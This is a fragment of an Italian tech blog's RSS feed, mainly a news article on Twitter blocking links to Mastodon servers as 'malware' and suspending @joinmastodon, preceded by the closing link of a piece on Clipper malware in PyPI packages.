			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0cd3167089{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0cd3167089{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0cd3167089{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0cd3167089{position: relative !important;}}</style>
		</div>
	

	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6a9b57c0cd56f3779"  >
			<div class="wpb_wrapper">
				<p>Puoi trovare la ripartizione completa della campagna di Phylum e l&#8217;elenco dei pacchetti scoperti <a href="https://blog.phylum.io/phylum-discovers-revived-crypto-wallet-address-replacement-attack">qui</a>.</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0cd56f3779{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0cd56f3779{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0cd56f3779{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0cd56f3779{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2023-02-pypi-malware-clipper/">Malware Clipper trovato in oltre 451 pacchetti PyPI</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Twitter impedisce agli utenti di condividere link provenienti da Mastodon</title>
		<link>https://www.webbare.it/2022-12-twitter-mastodon-block/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=twitter-mastodon-block</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 21 Dec 2022 12:59:08 +0000</pubDate>
				<category><![CDATA[Dev]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Web Developer]]></category>
		<category><![CDATA[Web Marketing]]></category>
		<category><![CDATA[Elon Musk]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[mastodon]]></category>
		<category><![CDATA[twitter]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2044</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2022-12-twitter-mastodon-block/">Twitter impedisce agli utenti di condividere link provenienti da Mastodon</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6a9b57c0cdfdc" class="vc_row wpb_row vc_row-fluid thegem-custom-6a9b57c0cdfd36402"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6a9b57c0ce28e502" ><div class="vc_column-inner thegem-custom-inner-6a9b57c0ce290 "><div class="wpb_wrapper thegem-custom-6a9b57c0ce28e502">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6a9b57c0ce4d8932"  >
			<div class="wpb_wrapper">
				<p><strong>Twitter</strong> ha impedito ai suoi utenti di condividere alcuni collegamenti al suo rivale sui social media Mastodon.</p>
<p><strong>Mastodon</strong> è diviso in gruppi, chiamati server, basati su molti argomenti tra cui il Regno Unito, lo snooker e la sicurezza.</p>
<p>Twitter ha bloccato i collegamenti ad alcuni dei server più grandi a cui gli utenti si unirebbero, incluso il canale &#8220;<strong>social</strong>&#8221; più popolare.</p>
<p>E Twitter sta anche impedendo agli utenti di aggiungere collegamenti al proprio account Mastodon nel proprio bios, chiamandoli &#8220;malware&#8221;.</p>
<p>Non ci sono assolutamente prove a sostegno del suggerimento che Mastodon contenga malware, software dannoso che può danneggiare il tuo dispositivo.</p>
<p>Mastodon ha affermato di aver guadagnato centinaia di migliaia di utenti a novembre, con alcuni utenti di Twitter che cercano piattaforme alternative.<br />
Uno screenshot da Twitter. Mostra un collegamento Mastodon nel campo Bio di un account. In fondo si legge &#8220;aggiornamento dell&#8217;account non riuscito, la descrizione è considerata malware&#8221;.</p>
<p><img class="aligncenter wp-image-2047 size-full" src="https://www.webbare.it/wp-content/uploads/2022/12/128025218_89dcb133-3837-4663-9c08-f278a85b3bff.webp" alt="" width="976" height="549" srcset="https://www.webbare.it/wp-content/uploads/2022/12/128025218_89dcb133-3837-4663-9c08-f278a85b3bff.webp 976w, https://www.webbare.it/wp-content/uploads/2022/12/128025218_89dcb133-3837-4663-9c08-f278a85b3bff-300x169.webp 300w, https://www.webbare.it/wp-content/uploads/2022/12/128025218_89dcb133-3837-4663-9c08-f278a85b3bff-768x432.webp 768w" sizes="(max-width: 976px) 100vw, 976px" /><br />
Lo stesso risultato si verifica se il collegamento viene pubblicato nel campo posizione o sito web.</p>
<p>La BBC non è stata in grado di pubblicare collegamenti al server mastodon.social più popolare, così come a più di altri 10, incluso un server per i giornalisti e un altro per le persone nel Regno Unito.</p>
<p>Ma non tutti i collegamenti a Mastodon sono stati bloccati e ci sono modi per aggirare il problema.</p>
<p>L&#8217;editor di tecnologia della BBC Zoe Kleinman è riuscita a twittare con successo un riferimento al suo account Mastodon &#8211; zsk@mastodonapp.uk &#8211; perché non è un link cliccabile.</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0ce4d8932{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0ce4d8932{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0ce4d8932{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0ce4d8932{position: relative !important;}}</style>
		</div>
	

	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6a9b57c0ce7235871"  >
			<div class="wpb_wrapper">
				<p>Un successivo tentativo di trasformare il riferimento in un collegamento cliccabile alla sua pagina Mastodon non può essere pubblicato su Twitter.</p>
<p>Non è chiaro quanti server Mastodon siano stati bloccati su Twitter, o perché.</p>
<p><img class="aligncenter wp-image-2046 size-full" src="https://www.webbare.it/wp-content/uploads/2022/12/128025220_mastodon4-002.webp" alt="" width="976" height="549" srcset="https://www.webbare.it/wp-content/uploads/2022/12/128025220_mastodon4-002.webp 976w, https://www.webbare.it/wp-content/uploads/2022/12/128025220_mastodon4-002-300x169.webp 300w, https://www.webbare.it/wp-content/uploads/2022/12/128025220_mastodon4-002-768x432.webp 768w" sizes="(max-width: 976px) 100vw, 976px" /></p>
<p>Gli utenti che tentano di pubblicare collegamenti a server bloccati riceveranno invece un messaggio di errore che dice: &#8220;Non possiamo completare questa richiesta perché questo collegamento è stato identificato da Twitter o dai nostri partner come potenzialmente dannoso&#8221;.<br />
Un tentativo di twittare il server principale di Mastodon, con il messaggio di errore visualizzato</p>
<p>Oltre a bloccare alcuni collegamenti a Mastodon, Twitter ha preso provvedimenti contro l&#8217;account principale del suo rivale.</p>
<p>L&#8217;account Twitter @joinmastodon, che pubblicizzava il sito e le sue funzionalità, è stato inaspettatamente sospeso giovedì insieme a quelli di diversi noti giornalisti che coprivano il proprietario di Twitter Elon Musk.</p>
<p>Ciò ha portato l&#8217;UE a minacciare Musk di sanzioni, con la commissaria Vera Jourova che ha avvertito che la legge sui servizi digitali dell&#8217;UE richiede il rispetto della libertà dei media.</p>
<p>&#8220;Elon Musk dovrebbe esserne consapevole. Ci sono linee rosse. E sanzioni, presto&#8221;, ha twittato.</p>
<p>Una portavoce di Twitter ha dichiarato al sito web tecnologico The Verge che il divieto dei giornalisti era correlato alla condivisione in diretta dei dati sulla posizione.</p>
<p>Ciò è avvenuto dopo che il signor Musk ha promesso di citare in giudizio il proprietario di un account Twitter che ha rintracciato il suo jet privato. Anche questo account è stato sospeso.</p>
<p>Sebbene non sia stato fornito alcun motivo per la sospensione di Mastodon, c&#8217;è una coincidenza nel tempismo: nelle poche ore precedenti, @joinmastodon ha condiviso un collegamento che mostra dove si trova la persona che segue il jet di Mr Musk sul sito di social media rivale.</p>
<p>Will Moy, amministratore delegato dell&#8217;ente di verifica dei fatti Full Fact, ha affermato di non sapere &#8220;alcun motivo&#8221; per cui ci sia &#8220;un blocco generale su Mastodon&#8221;.</p>
<p>&#8220;È preoccupante che una società di social media di vitale importanza come Twitter sembri prendere decisioni irregolari e irresponsabili che influiscono su ciò che tutti possiamo vedere e condividere online&#8221;, ha affermato.</p>
<p>&#8220;Se vogliamo seriamente difendere la nostra democrazia e riconoscere la potente influenza che i social media possono avere nel plasmare il nostro dibattito democratico, dobbiamo essere seri nel tenere conto di quel potere&#8221;.</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0ce7235871{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0ce7235871{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0ce7235871{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0ce7235871{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2022-12-twitter-mastodon-block/">Twitter impedisce agli utenti di condividere link provenienti da Mastodon</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
